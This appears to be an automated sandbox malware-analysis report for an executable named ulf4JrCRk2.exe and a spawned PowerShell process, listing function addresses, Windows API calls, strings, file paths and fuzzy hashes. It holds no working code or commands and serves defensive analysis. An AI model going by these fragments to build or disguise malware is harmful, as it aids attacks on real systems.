Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$1033$reckling: Installing
API String ID: 530164218-3157058741
Opcode ID: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction ID: afbb14256cc631d10caee281dea517f3a5a89f89e2cd0ba730366887019fa8a8
Opcode Fuzzy Hash: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction Fuzzy Hash: A411C2B1B04610ABC724DF15DC8092377BDEB84716328813BA84167391C63D9E029A98

Function 00405781 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405787
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405790
lstrcatA.KERNEL32(?,00409014), ref: 004057A1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405781

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: 5d0f413141f52f4d8e8af186490daeb449751c8a1e5703fa5fe58453a807c488
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: A4D0C9A2A059306AD3122655AC09F9B6A48CF56755B099077F200B62A2C67C5D418FFE

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28

Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F7F
CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0

Part of subcall function 00404038: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A

Strings

, xrefs: 00404F60

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669

Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
WriteFile.KERNEL32(00000000,?,incarnations\Vaporized\hippogriff,00000000,?,?,00000000,00000011), ref: 0040250E

Strings

incarnations\Vaporized\hippogriff, xrefs: 004024DD, 00402502

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FileWritelstrlen
String ID: incarnations\Vaporized\hippogriff
API String ID: 427699356-2641171360
Opcode ID: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
Instruction ID: 15837e18a0899aebe372c1c9672940312f560d5d25332acc002067b6f94eb92f
Opcode Fuzzy Hash: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
Instruction Fuzzy Hash: 78F089B2A54244BFDB40EBB09E499EB76A4DB50305F14443FF141F61C2D6FC4941A76E

Function 004036F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004036C9,76F93410,004034D6,?), ref: 0040370C
GlobalFree.KERNEL32(00000000), ref: 00403713

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403704

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9

Function 004057C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 004057CE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 004057DC

Strings

C:\Users\user\Desktop, xrefs: 004057C8

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: f40007591d3941cd74726badf399ab62381001b9e0dca56ace991d14a2ccaf85
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 4BD0A7B280CD705FF30352109C04B8F6A48CF16310F094063E040A71D0C2781C414BFD

Function 004058E7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9

Analysis Process: powershell.exePID: 2804, Parent PID: 3868COMMON

Executed Functions

Function 0456E3E0 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9354499e60198587ad4b173416f7aa8976016a645c4fd693de17f928a577be6d
Instruction ID: c39c26274a74615c840e82b71288e95538a02e5d0c9a8b6e59352f12d7bc719e
Opcode Fuzzy Hash: 9354499e60198587ad4b173416f7aa8976016a645c4fd693de17f928a577be6d
Instruction Fuzzy Hash: A5528A38B01219CFDB24CF64E8557ADBBB2FF85304F1445AAD90AAB250EB30AD85DF51

Function 07444D68 Relevance: 3.6, Strings: 2, Instructions: 1098COMMON

Download Yara Rule

Strings

(fl, xrefs: 07445CED
(fl, xrefs: 07445CF7

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl
API String ID: 0-1194790885
Opcode ID: c29699c335ec00af67ff37ab7790b9764b6b67b2cbf507df71f68d61d3a81cd2
Instruction ID: 70402958a748873d6498558cb0c6a74d3d54187a4ce4db89bea44e624973ff9f
Opcode Fuzzy Hash: c29699c335ec00af67ff37ab7790b9764b6b67b2cbf507df71f68d61d3a81cd2
Instruction Fuzzy Hash: 0AA25074A00205CFEB24DB68C454B9EB7B2EF85719F2481AAD9156F381DBB6EC41CF81

Function 07444450 Relevance: 2.9, Strings: 2, Instructions: 373COMMON

Download Yara Rule

Strings

(fl, xrefs: 0744457B
(fl, xrefs: 07444571

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl
API String ID: 0-1194790885
Opcode ID: 3bb4c88cf43c513b93fdf342aec59e53ae4e4c9705eb1c4bc4984a97fa1f4d8c
Instruction ID: 1209877b7ff93daa34e7b7789e1ceac0dee24abb776e40b61b84fa142f2ba484
Opcode Fuzzy Hash: 3bb4c88cf43c513b93fdf342aec59e53ae4e4c9705eb1c4bc4984a97fa1f4d8c
Instruction Fuzzy Hash: 2EE1D5B4B002059FEB14DB68C491BEEB7B3AF88314F25C496D9016F395DB75EC428B91

Function 0744DB52 Relevance: 2.8, Strings: 2, Instructions: 333COMMON

Download Yara Rule

Strings

(fl, xrefs: 0744DCD1
(fl, xrefs: 0744DCBB

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl
API String ID: 0-1194790885
Opcode ID: 3d2267b6b0b6e4e6a31a798524f1653bd771e738a10b3058f445c6a1e1c4d921
Instruction ID: 0aaee1efc19c8332b7870fda102e3432651c2ffb080981763fbea04d8c162619
Opcode Fuzzy Hash: 3d2267b6b0b6e4e6a31a798524f1653bd771e738a10b3058f445c6a1e1c4d921
Instruction Fuzzy Hash: 34E14BB0B00219CFEB24DB54C885BEAB7B2AB85304F2085D6D6496F745DB72ED81CF91

Function 07444433 Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

(fl, xrefs: 07444571

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID: (fl
API String ID: 0-423539152
Opcode ID: 9c8337f0accb559382468c3e1f3ecb3a89ee7aaae386edb7f37e04161575c3c3
Instruction ID: 61e472fd7898f29f6755a9641f9f573eaf84ad4c7ee36f50611771d88eb31dbd
Opcode Fuzzy Hash: 9c8337f0accb559382468c3e1f3ecb3a89ee7aaae386edb7f37e04161575c3c3
Instruction Fuzzy Hash: FFC1F2B4A002458FEB14DB58C890BEEBBB2EF89314F25C496D9016F395DB75EC42CB91

Function 07444D4F Relevance: .9, Instructions: 888COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9660d08b51743c592b0779d565fc0082055683ce4873a2e9b00fce29556504e3
Instruction ID: 638db6fb74955f6958bece2d259a68a7a5923c884691946d94062a2efa109b36
Opcode Fuzzy Hash: 9660d08b51743c592b0779d565fc0082055683ce4873a2e9b00fce29556504e3
Instruction Fuzzy Hash: 9B826074A00204DFEB20DB58C450BA9F7B2EF85719F24859AD9156F382DBB6EC81CF81

Function 074440A0 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea39324073b73d15483f59dbda30229956d527692abf859ffe2392af1bee2b7
Instruction ID: 01674df9cc5a6b02858d9a982fc04d2e9c1834c8a95d06f896e4df37f1285b42
Opcode Fuzzy Hash: 4ea39324073b73d15483f59dbda30229956d527692abf859ffe2392af1bee2b7
Instruction Fuzzy Hash: F3524C74B002159FEB24DB18C851BAAB7B2FB84314F24C4D6D949AF351DBB2ED818F91

Function 0744D619 Relevance: .6, Instructions: 620COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0cdc14bb2841f5efe48dd82623d8bdfa80bd4197f2e6a0c30c9a955371e614
Instruction ID: 3264b64d5856d19db5ba1cc03a18b1333e457c625a4d7f04daf4839396227c61
Opcode Fuzzy Hash: 3a0cdc14bb2841f5efe48dd82623d8bdfa80bd4197f2e6a0c30c9a955371e614
Instruction Fuzzy Hash: 78424E74B002149FE724DB58C891BEAB7B2EB89304F1084D9DA496F355DBB2ED818FD1

Function 074437DC Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933441e6a5b7a9afb9ec9be7a907ebb51f0e5c0705d9a384ad66d815d5c8a116
Instruction ID: 7b95702680be80e0b1e1c12e46479c19fc0993125be88e736366affddbd8905c
Opcode Fuzzy Hash: 933441e6a5b7a9afb9ec9be7a907ebb51f0e5c0705d9a384ad66d815d5c8a116
Instruction Fuzzy Hash: B7324F74B002149FEB24DB58C851BAAB7B2EF84314F24C4D6D549AF391DBB2ED818F91

Function 04569A50 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0a385b44dd65c2cfac3a76b8c9782583fa7ab36b150b260f4a2447fc09b66a
Instruction ID: d3636e5bdfb4ce3c4a7d31cec7a4f68fafd2aee8fd8a1a5b203ec68ce1a80fd6
Opcode Fuzzy Hash: fd0a385b44dd65c2cfac3a76b8c9782583fa7ab36b150b260f4a2447fc09b66a
Instruction Fuzzy Hash: 93321674A01208EFDB15CFA8D484A9DFBF2BF49310F288559E805AB365C775ED81DB90

Function 0744CE28 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad62fd0edf233e87ee7634a61ad5f6be9660370278d6bab571af4fb4f3ec6934
Instruction ID: 326b76e2a272b10349c1e69d6dafc51f83ea7ab1a736c32501e66d4fdfc683c2
Opcode Fuzzy Hash: ad62fd0edf233e87ee7634a61ad5f6be9660370278d6bab571af4fb4f3ec6934
Instruction Fuzzy Hash: 18224E70B002149FE724DB58C891BEAB7B2EB89704F1084D5DA496F395DBB2ED818F91

Function 074441B1 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7864ec0f758f18aa6f93c965f1bf94c87bdd021670bd6f27e27ae4f9bac0522
Instruction ID: eb8e9b47bde5a7ee0424fbb29ebd0c7eef1882ca908bdb1906373649ee0c7432
Opcode Fuzzy Hash: f7864ec0f758f18aa6f93c965f1bf94c87bdd021670bd6f27e27ae4f9bac0522
Instruction Fuzzy Hash: 28225E74A002149FEB24DB18C891BAAB7B2FF84714F24C4D5D549AF391DBB2ED818F91

Function 07441477 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249f77f0ca207d38ed23ec9e8125bbdf43313fc5a8b904aeb21f1fe2eced8516
Instruction ID: 2fe7ff53e8bea40085a02bc260a0e16d9ed7ebb12545839fd87914f4549d9d92
Opcode Fuzzy Hash: 249f77f0ca207d38ed23ec9e8125bbdf43313fc5a8b904aeb21f1fe2eced8516
Instruction Fuzzy Hash: 74F14F74B41219DFE704DB58C451BAAB7B3EF85314F24C0A6E905AF351DAB2EC81CB91

Function 045672A0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20df07f23b519da7c3fcf58f463d79e0c3d118f1076e70d5ea9ec38ba1303412
Instruction ID: acb3b5798d07989d3abdb6be8532f82987284023de6c7013ccd72c2e6f2d0779
Opcode Fuzzy Hash: 20df07f23b519da7c3fcf58f463d79e0c3d118f1076e70d5ea9ec38ba1303412
Instruction Fuzzy Hash: 44C1AD34A00248CFDB14DFA8D944A9DBBB2FF89314F158569E806AF364DB34AD49DF80

Function 045695A8 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501c02ecdf67eb12bc9df9e9d172b466abffc133322c7eb79218911864d6d3b4
Instruction ID: 3d9ba9e4ae87714af44090a67d248f0faab5b33a0e05c7c5cae79f893d816b83
Opcode Fuzzy Hash: 501c02ecdf67eb12bc9df9e9d172b466abffc133322c7eb79218911864d6d3b4
Instruction Fuzzy Hash: 22A1BF2150E3D54FD7079B28D9A40DABF71AF432A470E41D7C4D1CF2A3C929AE0AD7A2

Function 04562AA0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7ee7382fbf76dbbbf55b7fef6921cbbbe7bec0ec7b82bb1d117d2878111b7d
Instruction ID: 079d869d49d0f5ab0968fda3aebeceb13197a29c6cc0f446b053350783e7721f
Opcode Fuzzy Hash: 3d7ee7382fbf76dbbbf55b7fef6921cbbbe7bec0ec7b82bb1d117d2878111b7d
